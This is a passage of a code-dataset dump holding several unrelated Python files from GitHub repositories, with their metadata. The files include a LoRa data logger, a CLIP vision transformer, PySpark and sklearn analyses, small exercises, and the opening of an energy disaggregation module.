int.from_bytes(payload[6:7], byteorder='big', signed=True)\n payload_data = payload[7:]\n directory = 'Logs '+str(dev_id)\n final_directory = os.path.join(current_directory, (r''+directory))\n if not os.path.exists(final_directory):\n os.makedirs(final_directory)\n servertime = int(dp.parse(str(Metadata[0])).timestamp())\n try:\n Log = open(directory+\"/Logs \"+date+\".csv\",'x')\n Last_line = open(directory+\"/last_line.txt\",'x')\n Last_line.close()\n Last_line = open(directory+\"/last_line.txt\",'w+')\n temp_line = Last_line.read()\n templist = []\n if port == 2 or port == 8:\n templist.append(battery_lvl)\n templist.append(light_lvl)\n templist.append(temperature)\n try:\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n except (ValueError, IndexError):\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if temp_line != line:\n Last_line.write(line)\n if port == 2 or port == 8:\n templist.insert(0, port)\n templist.insert(1, servertime)\n templist.insert(2, dev_timestamp)\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if port != 4: \n line = line\n else:\n line = \",\" + line\n Log.write(line)\n Log.close()\n Last_line.close()\n except FileExistsError:\n Log = open(directory+\"/Logs \"+date+\".csv\",'a')\n Last_line = open(directory+\"/last_line.txt\",'r')\n temp_line = Last_line.read()\n Last_line.close()\n templist = []\n if port == 2 or port == 8:\n templist.append(battery_lvl)\n templist.append(light_lvl)\n templist.append(temperature)\n try:\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n except (ValueError, IndexError):\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if temp_line != line:\n Last_line = open(directory+\"/last_line.txt\",'w')\n Last_line.write(line)\n Last_line.close()\n if port == 2 or port == 8:\n templist.insert(0, port)\n templist.insert(1,servertime)\n templist.insert(2, dev_timestamp)\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if port != 4: \n line = \"\\n\" + line\n else:\n line = \",\" + line\n Log.write(line)\n Log.close()\n\n\n\n\n\nsome_date = \"21.12.2018\"\n#Metadata format:\n\nmeta = [\"2018-11-08T11:41:52.772067729Z\", 868.1, \"LORA\", \"SF12BW125\", 1155072000, \"4/5\", [\n[\"trt-vm-loragw01\", True, 1040756148, \"2018-11-08T11:39:10Z\", 0, -120, -8.75, 1, 63.42883, 10.385698, 20], \n[\"trt-sluppen-loragw01\", True, 1338177276, \"2018-11-08T11:39:43Z\", 0, -114, 2.75, 1, 63.397568, 10.400948, 21], \n[\"trt-samf-loragw01\", True, 1567384756, \"2018-11-08T12:02:07Z\", 0, -111, 3.5, 1, 63.422485, 10.395755, 20], \n[\"eui-008000000000a447\", False,1628454124, \"2018-11-08T13:04:42.647744Z\", 0, -119, -13.8, 0, 63.41785, 10.4021, 112],\n[\"trt-olav-loragw01\", True, 3798105164, \"2018-11-08T11:40:27Z\", 0, -117, -14.25, 1, 63.43338, 10.403285, 19], \n[\"ntnu1\", True, 2597174828, \"2018-11-08T11:41:52Z\", 0, -119, -15, 1, 63.41831, 10.400998, 60, \"registry\"]]\n]\n\n#WritePayloadDataToFile(\"lorakeypad\", testpayload, meta, some_date)\n#WritePayloadDataToFile(\"lorakeypad\", testpayload, meta, some_date)\n","repo_name":"tobulf/Master2019_TTN-server","sub_path":"Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29682203536","text":"import os, glob, sys\n\ndef ecrire(liste):\n fichier = \"liste.txt\"\n print(\"Ecriture dans le fichier '{}'...\".format(fichier))\n with open(fichier, 'w') as f:\n for item in liste:\n f.write(item)\n f.write(\"\\n\")\n print(\"OK!\")\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage : listwriter2 /dossier\")\n sys.exit()\n else:\n ext = input(\"Type d'extention : \")\n chemin = str(sys.argv[1])+\"**/*\"\n print(chemin)\n liste = glob.glob(chemin+ext,recursive=True)\n ecrire(liste) \n\nif __name__==\"__main__\":\n main()\n","repo_name":"TuxStory/Python3","sub_path":"listevwriter2.py","file_name":"listevwriter2.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"22556452785","text":"import numpy as np\nimport pytest\nfrom classes_functions import BinaryArray, BinaryConverter, invert\nfrom classes_functions import find_scrubber_number\ndef test():\n A = np.array([0,1,0,0,1])\n B = BinaryConverter(A)\n assert B.decimal == 9\n\n\ndef test_invert():\n B = invert(np.array([0,1,0,0,1]))\n C = BinaryConverter(B)\n assert C.decimal == 22\n\nclass TestSecondStar():\n def setup(self):\n self.A = [\n '00100',\n '11110',\n '10110',\n '10111',\n '10101',\n '01111',\n '00111',\n '11100',\n '10000',\n '11001',\n '00010',\n '01010'\n ]\n\n def test_binary_array(self):\n self.setup()\n BinArr = BinaryArray(self.A, do_invert=False)\n result3 = np.array([1, 0, 1, 1, 1])\n \n for i in range(5):\n assert BinArr.binary_array[3, i] == result3[i]\n\n def test_o2_rating(self):\n self.setup()\n BinArr = BinaryArray(self.A)\n \n scrubber = find_scrubber_number(BinArr) \n\n result = np.array([1,0,1,1,1])\n \n for i in range(5):\n assert scrubber[i] == result[i]\n \n def test_co2_rating(self):\n self.setup()\n BinArr = BinaryArray(self.A, do_invert=True)\n\n scrubber = find_scrubber_number(BinArr) \n\n result = np.array([0,1,0,1,0])\n \n for i in range(5):\n assert scrubber[i] == result[i]\noxygen_rating = BinaryConverter(oxygen_rating_binary).decimal\n","repo_name":"MatKie/AdventOfCode2021","sub_path":"3/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37149016837","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, make_scorer\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt\n\nshow_server = 1\nif show_server:\n name = \"server\"\nelse: \n name = \"client\"\n\n'''\nmaxpool columns= \"maxpool_N\", \"maxpool_H\", \"maxpool_W\", \"maxpool_C\", \"maxpool_ksizeH\", \"maxpool_ksizeW\", \n \"maxpool_zPadHLeft\", \"maxpool_zPadHRight\", \"maxpool_zPadWLeft\", \"maxpool_zPadWRight\",\n \"maxpool_strideH\", \"maxpool_strideW\", \"maxpool_N1\", \n \"maxpool_imgH\", \"maxpool_imgW\", \"maxpool_C1\", 'time_cost'\n'''\nlayer_filepath = \"/home/eloise/eloise/script/analysis/per_layer_onlyTime/dataset/maxpool_onlyTime_\" + name + \".csv\"\ndf = pd.read_csv(layer_filepath, delimiter=\"\\s+\")\n\n\n\n\n# print(df.head(10))\n# X = df.loc[:, [\"maxpool_N\", \"maxpool_H\", \"maxpool_W\", \"maxpool_C\", \"maxpool_ksizeH\", \"maxpool_ksizeW\"]]\n\n### Process on dataset\n# print(\"*** Number of data before processing: \", df.size)\n# df = df[(df['time_cost'] > 0) &(df['time_cost'] < 20000)]\n# print(\"*** Number of data after processing: \", df.size)\n\n### Training and testing\nX = pd.DataFrame()\nmp_H_output = (df['maxpool_H'] + df[\"maxpool_zPadHLeft\"] + df[\"maxpool_zPadHRight\"] - df[\"maxpool_ksizeH\"]) / df[\"maxpool_strideH\"] + 1\nmp_W_output = (df['maxpool_W'] + df[\"maxpool_zPadWLeft\"] + df[\"maxpool_zPadWRight\"] - df[\"maxpool_ksizeW\"]) / df[\"maxpool_strideW\"] + 1\n\n'''physical operations'''\nX['FLOPs'] = (df[\"maxpool_ksizeH\"] * df[\"maxpool_ksizeW\"]) * (mp_H_output * mp_W_output) * df[\"maxpool_C\"]\n# sizeof(uint64_t) is unsigned 64-bit integer -> 8 bytes\nX['IN_MACs'] = (df['maxpool_H'] * df['maxpool_W']) * df[\"maxpool_C\"] * 8\nX['OUT_MACs'] = (mp_H_output * mp_W_output) * df[\"maxpool_C\"] * 8\n\ny = df['time_cost']\n\n# Define a custom function to calculate max difference\ndef max_difference(values):\n return max(values) - min(values)\n\n# Group by the specified columns and aggregate 'time_cost'\ngrouped_df = df.groupby([\"maxpool_N\", \"maxpool_H\", \"maxpool_W\", \"maxpool_C\", \"maxpool_ksizeH\", \"maxpool_ksizeW\", \n \"maxpool_zPadHLeft\", \"maxpool_zPadHRight\", \"maxpool_zPadWLeft\", \"maxpool_zPadWRight\",\n \"maxpool_strideH\", \"maxpool_strideW\", \"maxpool_N1\", \n \"maxpool_imgH\", \"maxpool_imgW\", \"maxpool_C1\"])['time_cost'].agg([list, max_difference]).reset_index()\n\n# Rename the columns for better clarity\ngrouped_df = grouped_df.rename(columns={'list': 'time_cost_list', 'max_difference': 'max_time_cost_difference'})\n\n# Save the grouped DataFrame as a CSV file\ngrouped_df.to_csv('grouped_maxpool.csv', index=False)","repo_name":"Eloise2000/SNNI-Performance-Evaluator","sub_path":"analysis/per_layer_onlyTime/predict_regression/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"115722277","text":"\r\nfrom collections import OrderedDict\r\nfrom typing import Tuple, Union\r\n\r\nimport hashlib\r\nimport os\r\nimport urllib\r\nimport warnings\r\nfrom tqdm import tqdm\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch import nn\r\n\r\nclass LayerNorm(nn.LayerNorm):\r\n \"\"\"Subclass torch's LayerNorm to handle fp16.\"\"\"\r\n\r\n def forward(self, x: torch.Tensor):\r\n orig_type = x.dtype\r\n ret = super().forward(x.type(torch.float32))\r\n return ret.type(orig_type)\r\n\r\n\r\nclass QuickGELU(nn.Module):\r\n def forward(self, x: torch.Tensor):\r\n return x * torch.sigmoid(1.702 * x)\r\n\r\n\r\nclass ResidualAttentionBlock(nn.Module):\r\n def __init__(self, d_model: int, n_head: int, attn_mask=None):\r\n super().__init__()\r\n\r\n self.attn = nn.MultiheadAttention(d_model, n_head)\r\n self.ln_1 = LayerNorm(d_model)\r\n self.mlp = nn.Sequential(OrderedDict([\r\n (\"c_fc\", nn.Linear(d_model, d_model * 4)),\r\n (\"gelu\", QuickGELU()),\r\n (\"c_proj\", nn.Linear(d_model * 4, d_model))\r\n ]))\r\n self.ln_2 = LayerNorm(d_model)\r\n self.attn_mask = attn_mask\r\n\r\n def attention(self, x: torch.Tensor):\r\n attn_mask_ = self.attn_mask\r\n if self.attn_mask is not None and hasattr(self.attn_mask, '__call__'):\r\n attn_mask_ = self.attn_mask(x.size(0)) # LND\r\n\r\n attn_mask_ = attn_mask_.to(dtype=x.dtype, device=x.device) if attn_mask_ is not None else None\r\n return self.attn(x, x, x, need_weights=False, attn_mask=attn_mask_)[0]\r\n\r\n def forward(self, x):\r\n x = x + self.attention(self.ln_1(x))\r\n x = x + self.mlp(self.ln_2(x))\r\n return x\r\n\r\n\r\nclass Transformer(nn.Module):\r\n def __init__(self, width: int, layers: int, heads: int, attn_mask = None):\r\n super().__init__()\r\n self.width = width\r\n self.layers = layers\r\n self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)])\r\n\r\n def forward(self, x: torch.Tensor):\r\n return self.resblocks(x)\r\n\r\nclass VisionTransformer(nn.Module):\r\n def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int):\r\n super().__init__()\r\n self.input_resolution = input_resolution\r\n\r\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, bias=False)\r\n\r\n scale = width ** -0.5\r\n self.class_embedding = nn.Parameter(scale * torch.randn(width))\r\n self.positional_embedding = nn.Parameter(scale * torch.randn((input_resolution // patch_size) ** 2 + 1, width))\r\n self.ln_pre = LayerNorm(width)\r\n self.transformer = Transformer(width, layers, heads)\r\n self.ln_post = LayerNorm(width)\r\n self.proj = nn.Parameter(scale * torch.randn(width, 512))\r\n\r\n\r\n\r\n def forward(self, x: torch.Tensor):\r\n\r\n x = self.conv1(x) # shape = [*, width, grid, grid]\r\n\r\n x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid ** 2]\r\n x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width]\r\n x = torch.cat([self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1) # shape = [*, grid ** 2 + 1, width]\r\n x = x + self.positional_embedding.to(x.dtype)\r\n x = self.ln_pre(x)\r\n\r\n x = x.permute(1, 0, 2) # NLD -> LND\r\n x = self.transformer(x)\r\n x = x.permute(1, 0, 2) # LND -> NLD\r\n x = self.ln_post(x)\r\n return x\r\n\r\nclass CLIP(nn.Module):\r\n def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int):\r\n super().__init__()\r\n\r\n self.visual = VisionTransformer(input_resolution, patch_size, width, layers, heads)\r\n\r\n self.transformer = Transformer(\r\n width=512,\r\n layers=12,\r\n heads=8,\r\n attn_mask=self.build_attention_mask\r\n )\r\n\r\n\r\n def build_attention_mask(self, context_length):\r\n # lazily create causal attention mask, with full attention between the vision tokens\r\n # pytorch uses additive attention mask; fill with -inf\r\n mask = torch.zeros(context_length, context_length)\r\n mask.fill_(float(\"-inf\"))\r\n mask.triu_(1) # zero out the lower diagonal\r\n mask = mask.to(self.dtype)\r\n return mask\r\n\r\n\r\n\r\n\r\n def encode_image(self, image, return_hidden=False):\r\n\r\n hidden = self.visual(image)\r\n #hidden = hidden @ self.visual.proj\r\n\r\n #x = hidden[:, 0, :]\r\n\r\n x = hidden\r\n if return_hidden:\r\n return x, hidden\r\n\r\n return x\r\n\r\n def forward(self, image):\r\n image_features = self.encode_image(image)\r\n #text_features = self.encode_text(text)\r\n\r\n return image_features\r\n # normalized features\r\n #image_features = image_features / image_features.norm(dim=-1, keepdim=True)\r\n #text_features = text_features / text_features.norm(dim=-1, keepdim=True)\r\n\r\n # cosine similarity as logits\r\n #logit_scale = self.logit_scale.exp()\r\n #logits_per_image = logit_scale * image_features @ text_features.t()\r\n #logits_per_text = logit_scale * text_features @ image_features.t()\r\n\r\n # shape = [global_batch_size, global_batch_size]\r\n #return logits_per_image, logits_per_text","repo_name":"MrZihan/GridMM","sub_path":"preprocess/model_clip.py","file_name":"model_clip.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"48"} +{"seq_id":"17236905236","text":"\"\"\"\n10: На столе лежат n монеток. Некоторые из них лежат вверх решкой, а некоторые – гербом. \nОпределите минимальное число монеток, которые нужно перевернуть, чтобы все монетки были \nповернуты вверх одной и той же стороной. Выведите минимальное количество монет, которые нужно перевернуть\n\"\"\"\nimport random \n\ncoin = int(input('Введите количество монеток: '))\nside_coin = 0\nreshka = orel = 0\n\nfor i in range(coin):\n side_coin = random.randint(0, 1)\n print(side_coin, end=\" \")\n if side_coin == 0:\n reshka += 1\n else:\n orel += 1\nif reshka == 0 or orel == 0:\n print(f'\\nМонет: {coin}, решка: {reshka}, орел: {orel}. Переворачивать нечего.')\nelif reshka < orel:\n print(f'\\nМонет: {coin}, решка: {reshka}, орел: {orel}. Перевернём наименьшее количество решек: {reshka}')\nelse:\n print(f'\\nМонет: {coin}, решка: {reshka}, орел: {orel}. Перевернём наименьшее количество орлов: {orel}')\n","repo_name":"bubaleh1337/python_course.GB","sub_path":"seminars/sem2/hw/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74380718225","text":"import pyspark.sql.functions as F\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession.builder \\\n .master(\"local[1]\") \\\n .appName(\"SparkByExamples.com\") \\\n .getOrCreate()\ndf = spark.range(500).toDF(\"number\").filter(\"number < 600\").withColumn(\"mod_val\", F.col(\"number\") % 100)\ndf.explain(extended=True)\n\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import StructField, StructType, StringType, LongType\nmyManualSchema = StructType([\nStructField(\"some\", StringType(), True),\nStructField(\"col\", StringType(), True),\nStructField(\"names\", LongType(), False)\n])\nmyRow = Row(\"Hello\", None, 1)\nmyDf = spark.createDataFrame([myRow], myManualSchema)\nmyDf.show()\n","repo_name":"charantej224/spark_demystified","sub_path":"spark_analyzer/plan_details.py","file_name":"plan_details.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73744515987","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 23 13:59:37 2020\r\n\r\n@author: Tyler\r\n\"\"\"\r\n\r\n#importing modules for project\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nimport math\r\n\r\n#loading train and test data to dataframes\r\ntrain = pd.read_csv(r'C:\\Users\\Tyler\\Desktop\\Projects\\Kaggle\\New York Taxi Fare Prediction\\train.csv')\r\ntest = pd.read_csv(r'C:\\Users\\Tyler\\Desktop\\Projects\\Kaggle\\New York Taxi Fare Prediction\\test.csv')\r\n\r\n#creation of rmse to match with kaggle scoring\r\ndef rmse(predictions, targets):\r\n return np.sqrt(((predictions - targets) ** 2).mean())\r\n\r\n#creation of hour columns from pickup_datetime\r\ntrain['pickup_datetime'] = pd.to_datetime(train['pickup_datetime'])\r\ntest['pickup_datetime'] = pd.to_datetime(test['pickup_datetime'])\r\ntrain['hour'] = train['pickup_datetime'].dt.hour\r\ntest['hour'] = test['pickup_datetime'].dt.hour\r\n\r\n#function for calculating distance based off of dropoff/pickup lat/longs\r\ndef haversine(lat_start, long_start, lat_end, long_end):\r\n \r\n #radius of the Earth\r\n R = 6373.0\r\n \r\n #lat-long coordinates\r\n lat1 = math.radians(lat_start)\r\n long1 = math.radians(long_start)\r\n lat2 = math.radians(lat_end)\r\n long2 = math.radians(long_end)\r\n \r\n #change in coordinates\r\n d_lat = lat2 - lat1\r\n d_long = long2 - long1\r\n \r\n #haversine formula\r\n a = math.sin(d_lat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(d_long / 2)**2\r\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n distance = R * c\r\n return(distance)\r\n\r\n#adding distance columns to train/test datasets\r\ntest['distance'] = test.apply(lambda row:\r\n haversine(row['pickup_latitude'], row['pickup_longitude'], row['dropoff_latitude'], row['dropoff_longitude']),\r\n axis=1)\r\ntrain['distance'] = train.apply(lambda row:\r\n haversine(row['pickup_latitude'], row['pickup_longitude'], row['dropoff_latitude'], row['dropoff_longitude']),\r\n axis=1)\r\n\r\n#creating validation set from training data\r\nvalidation_train, validation_test = train_test_split(train,\r\n test_size = 0.3,\r\n random_state = 123)\r\n","repo_name":"tylerfeese/Kaggle-Submissions","sub_path":"TaxiFare.py","file_name":"TaxiFare.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25115839834","text":"PLOTTING=False\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n# Read the data\ndf=pd.read_csv(\"Cristae Thickness.csv\").astype('float64')\n\nfor tissue_prep in ['Intact', 'Permeabilised']:\n\tx=df['Temperature'].to_numpy()\n\ty=df[tissue_prep].to_numpy()\n\n\ttck = interpolate.splrep(x, y, k=2, s=0)\n\txnew = np.linspace(x.min(), x.max())\n\n\t# Plot the data\n\tif PLOTTING is True:\n\t\tfig, axes = plt.subplots(3)\n\n\t\taxes[0].plot(x, y, 'x', label = 'data')\n\t\taxes[1].plot(x, interpolate.splev(x, tck, der=1), label = '1st dev')\n\t\tdev_2 = interpolate.splev(x, tck, der=2)\n\t\taxes[2].plot(x, dev_2, label = '2st dev')\n\n\t\tturning_point_mask = dev_2 == np.amax(dev_2)\n\t\taxes[2].plot(x[turning_point_mask], dev_2[turning_point_mask],'rx',\n\t label = 'Turning point')\n\t\tfor ax in axes:\n\t\t ax.legend(loc = 'best')\n\n\t\tplt.show()\n\t\t\n\tprint(f\"{tissue_prep} break point: {x[turning_point_mask]}\")\n\n","repo_name":"julio0029/Science","sub_path":"Segmented_regressio.py","file_name":"Segmented_regressio.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43587440305","text":"# Name: Michael Zonneveld\n# Studentnumber: 11302984\n\nimport csv\nimport json\n\n# setting keys for indexing later on \nfieldnames = (\"year\",\"num_parts_MEAN\")\n\n# read the csv file\nwith open('11302984_legofile.csv') as csv_f:\n reader = csv.DictReader(csv_f, fieldnames)\n rows = list(reader)\n\n# write to json file, making it a dict\nwith open('11302984_legofile.json', 'w') as json_f:\n json_f.write('{\"stats\":' )\n json.dump(rows, json_f)\n json_f.write('}')\n","repo_name":"michaelzon/dataprocessing","sub_path":"homework/week_3/convertCSV2JSON.py","file_name":"convertCSV2JSON.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35783981710","text":"def percentile_score(marks_list, yourmark):\n\n # Get number of students who scored less than ypur marks \n less_than_yourmark = len([mark for mark in marks_list if mark < yourmark])\n\n # Calculate the percentile score\n total_students = len(marks_list)\n percentile = (less_than_yourmark / total_students) * 100\n\n return percentile\n\nmarks = [800, 300, 950, 760, 680, 490, 640]\nyourmark = 760\npercentile = percentile_score(marks, yourmark)\nprint(f'Percentile score for {yourmark} marks is {percentile: ,.2f}')\n","repo_name":"alifiyakapasi07/CodeGenie_2023","sub_path":"problem-solution/CalculatePercentileScore.py","file_name":"CalculatePercentileScore.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7542325463","text":"# -*- coding: utf-8 -*-\n#simple interest\ndef si(p,t,r):\n res=(p*t*r)/100\n return res\np=int(input(\"Enter the p\\n\"))\nt=int(input(\"Enter the t\\n\"))\nr=int(input(\"Enter the r\\n\"))\nres=si(p,t,r)\nprint(res)\n\n#prime\nnum1=int(input(\"Enter Num1\"))\nnum2=int(input(\"Enter Num2\"))\nfor i in range(num1,num2+1):\n if i>1:\n for n in range(2,i):\n if(i%n)==0:\n break\n else:\n print(i)\n \n#fseries\nnum=int(input(\"Enter the number\"))\ndef fs(num):\n if num<=1:\n return num\n else:\n return (fs(num-1)+fs(num-2))\nfor i in range(num):\n print(fs(i))\n\n#Electric\ncon=int(input(\"Enter the consumption\\n\"))\nif con<=100:\n print(\"Rate per unit rupees is \",2*con)\nelif con>100 and con<=200:\n print(\"Rate per unit rupees is \",3*con)\nelif con>200 and con<=300:\n print(\"Rate per unit rupees is \",5*con)\nelse:\n print(\"Rate per unit rupees is \",6*con)\n\n ","repo_name":"Nyrikabr/pythonassignment","sub_path":"Assignment1.py","file_name":"Assignment1.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17501114260","text":"import requests\n\nr = requests.get(\"https://cloud.hakka.gov.tw/Pub/Opendata/DTST20171100025.json\")\nlist_data = r.json()[\"NewDataSet\"][\"Table\"]\n\nfp= open(\"data_20211021.csv\", \"w\")\n\nhead = \"\"\nfor key in list_data[0]:\n head = head + str(key) + \",\"\nfp.write(head)\n\nfor i in list_data:\n data = \"\"\n for key in i:\n data += str(i[key]) + \",\"\n data += \"\\n\"\n fp.write(data)\n \n\nfp.close()\n \n","repo_name":"fannykong102/110_1Spider","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4698815093","text":"#coding=utf-8\r\n'''\r\nCreated on 2018-06-06\r\n\r\n@author: wenhaohu\r\n\r\n使用synonyms,去近义词或者语义相同的词\r\n\r\n使用的技术:word2vec计算语义相似度;\r\n使用编辑距离计算两个词的相似度;\r\n\r\n'''\r\nimport synonyms\r\n\r\n#展示近义词,调试用\r\nsynonyms.display(\"楼盘\")\r\n\r\n#计算指定的两个词近似度\r\n#默认对输入的两个待计算串进行分词\r\nr = synonyms.compare(\"你好明天\", \"明天很不好\", seg=True)\r\nprint(r)\r\n\r\n#计算某个词的近词,list返回\r\nwordSimList = synonyms.nearby(\"美铝\")\r\nprint(wordSimList)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chlyzzo/DeepLearnings","sub_path":"nlpRelates/usesynonyms.py","file_name":"usesynonyms.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2814246819","text":"def block_shifting(matrix):\n result = [[0 for _ in range(8)] for _ in range(8)]\n for i in range(8):\n for j in range(8):\n result[i][j] = matrix[7 - i][7 - j] - 128 # Subtrair 128 para obter os valores negativos\n return result\n\n# Entrada da matriz\nmatrix = []\nfor _ in range(8):\n row = list(map(int, input().split()))\n matrix.append(row)\n\n# Aplicar o algoritmo de block shifting\nresult = block_shifting(matrix)\ninverted_matrix = [row[::-1] for row in result[::-1]]\n\n# Imprimir a matriz resultante\nfor row in inverted_matrix:\n print(' '.join(map(str, row)))\n","repo_name":"camillacorreia/listas-sistemas-multimidia","sub_path":"block-shifting.py","file_name":"block-shifting.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24984651154","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRun disaggregation for all selected appliances\n\"\"\"\nfrom __future__ import print_function\nimport os.path\nimport sys\n\nsys.path.append(os.path.join(os.path.join(os.path.dirname(__file__), '..'), '..'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nselect_gpu = 0\nmem_limit = 2500\n# tf train setup\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Create 2 virtual GPUs with 1GB memory each\n try:\n tf.config.experimental.set_visible_devices(gpus[select_gpu], 'GPU')\n tf.config.experimental.set_memory_growth(gpus[select_gpu], True)\n tf.config.experimental.set_virtual_device_configuration(\n gpus[select_gpu],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=mem_limit)])\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPU,\", len(logical_gpus), \"Logical GPUs\")\n except RuntimeError as e:\n # Virtual devices must be set before GPUs have been initialized\n print(e)\n\nimport pandas as pd\nimport importlib\nimport logging\nimport time\nfrom utils.utils import convert_to_datetime\nfrom config import default_models\nimport platform\nfrom utils.edge_detection import event_detection\n\n\nlogging.basicConfig(format='%(asctime)s %(message)s')\nlogger = logging.getLogger(__name__)\n\n_module_names = {\n 'AIR_CONDITIONER': 'air_conditioner_classifier',\n 'BASE_LOAD': 'base_load_classifier',\n 'DISHWASHER': 'dishwasher_classifier',\n 'DRYER': 'dryer_classifier',\n 'ELECTRIC_VEHICLE': 'electric_vehicle_classifier',\n 'HEATING': 'heating_classifier',\n 'REFRIGERATOR': 'refrigerator_classifier',\n 'WASHING_MACHINE': 'washing_machine_classifier',\n\n}\n\n_classifier_names = {\n 'AIR_CONDITIONER': 'AirConditionerClassifier',\n 'BASE_LOAD': 'BaseLoadClassifier',\n 'DISHWASHER': 'DishwasherClassifier',\n 'DRYER': 'DryerClassifier',\n 'ELECTRIC_VEHICLE': 'ElectricVehicleClassifier',\n 'HEATING': 'HeatingClassifier',\n 'REFRIGERATOR': 'RefrigeratorClassifier',\n 'WASHING_MACHINE': 'WashingMachineClassifier',\n}\n\napp_name = {\n 'AIR_CONDITIONER': 'AirConditioner',\n 'BASE_LOAD': 'BaseLoad',\n 'DISHWASHER': 'Dishwasher',\n 'DRYER': 'Dryer',\n 'ELECTRIC_VEHICLE': 'ElectricVehicle',\n 'HEATING': 'Heating',\n 'REFRIGERATOR': 'Refrigerator',\n 'WASHING_MACHINE': 'WashingMachine',\n}\n\n\nclass Disaggregator(object):\n\n def __init__(self):\n\n self.models_dir = './models'\n self.default_appliance_model_dict = default_models\n self.appliance_classifier_dict = {} # {Key: appliance name, Value: Classifier Object}\n\n self.log = logging.getLogger(__name__)\n self.log.setLevel(logging.DEBUG)\n self.load_default_models()\n\n def load_default_models(self):\n \"\"\"\n Loads the default models into the memory\n \"\"\"\n\n self.log.info(\"-----Starting to load default models for all the appliances-----\")\n for appliance_name, model_name in self.default_appliance_model_dict.items():\n if not self._check_if_model_already_loaded(appliance_name, model_name):\n try:\n module = importlib.import_module(('classifiers.{}'.format(_module_names[appliance_name])))\n class_ = getattr(module, '{}'.format(_classifier_names[appliance_name]))\n self.appliance_classifier_dict[appliance_name] = class_(model_name=model_name)\n except Exception as e:\n raise e\n\n try:\n self.log.info(\"Loading model with model name {} for appliance {}......\".format(\n model_name, appliance_name))\n 